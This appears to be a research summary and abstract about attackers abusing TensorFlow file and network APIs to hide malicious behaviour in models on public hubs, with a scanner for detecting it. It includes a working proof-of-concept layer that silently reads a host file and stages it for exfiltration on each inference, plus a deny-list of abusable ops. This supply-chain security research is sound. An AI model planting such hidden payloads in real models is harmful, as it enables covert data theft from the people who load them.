🤖 AI Summary
This study addresses the security risk of semantic misuse of deep learning (DL) framework APIs, such as the file I/O and network communication functionality in TensorFlow, which attackers can exploit to embed malicious behavior in publicly distributed models and achieve remote code execution or data exfiltration. Existing detection tools rely primarily on syntactic features and often fail to identify such semantically sophisticated attacks. To bridge this gap, the work presents a detection framework that combines static program analysis with large language model (LLM)-based semantic understanding, tailored to the TensorFlow and Hugging Face ecosystems. Through empirical evaluation, the authors reproduce multiple stealthy attack variants and show that current platform scanners frequently miss them. Their approach identifies high-risk API usage patterns and substantially improves the detection of malicious DL models.
📝 Abstract
According to Gartner, more than 70% of organizations will have integrated AI models into their workflows by the end of 2025. To reduce cost and foster innovation, pre-trained models are often fetched from model hubs like Hugging Face or TensorFlow Hub. However, this introduces a security risk: attackers can inject malicious code into the models they upload to these hubs, enabling attacks including remote code execution (RCE), sensitive data exfiltration, and system file modification when these models are loaded or executed (e.g., via the predict function). Since AI models play a critical role in digital transformation, this drastically increases the exposure to software supply chain attacks. While there are several efforts to detect malware during deserialization of pickle-based saved models (i.e., malware hidden in model parameters), the risk of abusing DL APIs (e.g., TensorFlow APIs) is understudied. Specifically, we show how one can abuse hidden functionalities of TensorFlow APIs, such as file read/write and network send/receive, along with their persistence APIs, to launch attacks. It is concerning that existing scanners on model hubs like Hugging Face and TensorFlow Hub are unable to detect some of the stealthy abuses of such APIs. This is because these scanning tools check only for a syntactically identified set of suspicious functions and lack a semantic-level understanding of the functionality being used. After demonstrating the possible attacks, we show how one can identify potentially abusable hidden API functionalities using LLMs and build scanners to detect such abuses.
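To make the abstract's attack surface concrete, the sketch below (our illustration, not the paper's actual payload) shows how ordinary TensorFlow graph ops such as `tf.io.read_file` and `tf.io.write_file` can be hidden inside a model so that file access runs on every inference. Because these are legitimate graph ops serialized directly into the SavedModel, no pickle deserialization or custom Python code is involved, which is exactly the blind spot of syntactic pickle scanners.

```python
# A minimal sketch (assumed, for illustration) of smuggling file I/O into a
# SavedModel: ReadFile/WriteFile become ordinary nodes in the serialized graph
# and execute at inference time, with no pickle payload anywhere.
import tensorflow as tf

class LeakyDense(tf.Module):
    """Looks like a plain dense layer, but copies a host file on each call."""

    def __init__(self):
        super().__init__()
        self.w = tf.Variable(tf.random.normal([4, 2]), name="w")

    @tf.function(input_signature=[tf.TensorSpec([None, 4], tf.float32)])
    def __call__(self, x):
        # Hidden payload: these are stateful graph ops, so they survive
        # serialization and run on every forward pass of the loaded model.
        secret = tf.io.read_file("/etc/hostname")   # arbitrary file read
        tf.io.write_file("/tmp/exfil.txt", secret)  # staged for later pickup
        return tf.matmul(x, self.w)

model = LeakyDense()
tf.saved_model.save(model, "/tmp/innocent_model")  # payload ships in the graph
```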
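On the detection side, the static half of such a scanner can be sketched as a walk over the SavedModel protobuf that flags op types previously labeled as abusable (in the paper, that labeling step is LLM-assisted). The deny-list below is an illustrative assumption, not the authors' actual list.

```python
# A minimal sketch of a static SavedModel scanner: parse saved_model.pb and
# report nodes whose op type appears on an (assumed) abusable-API deny-list.
from tensorflow.core.protobuf import saved_model_pb2

# Illustrative deny-list only; the paper derives its list with LLM assistance.
SUSPICIOUS_OPS = {"ReadFile", "WriteFile", "MatchingFiles", "SaveV2"}

def scan(model_dir: str) -> list[tuple[str, str]]:
    sm = saved_model_pb2.SavedModel()
    with open(f"{model_dir}/saved_model.pb", "rb") as f:
        sm.ParseFromString(f.read())
    findings = []
    for mg in sm.meta_graphs:
        for node in mg.graph_def.node:              # top-level graph nodes
            if node.op in SUSPICIOUS_OPS:
                findings.append((node.name, node.op))
        for fn in mg.graph_def.library.function:    # traced tf.function bodies
            for node in fn.node_def:
                if node.op in SUSPICIOUS_OPS:
                    findings.append((fn.signature.name, node.op))
    return findings

print(scan("/tmp/innocent_model"))
```

Run against the model saved above, this would surface the `ReadFile` and `WriteFile` nodes hidden in the traced function body, which is the signal a purely pickle-oriented scanner never sees.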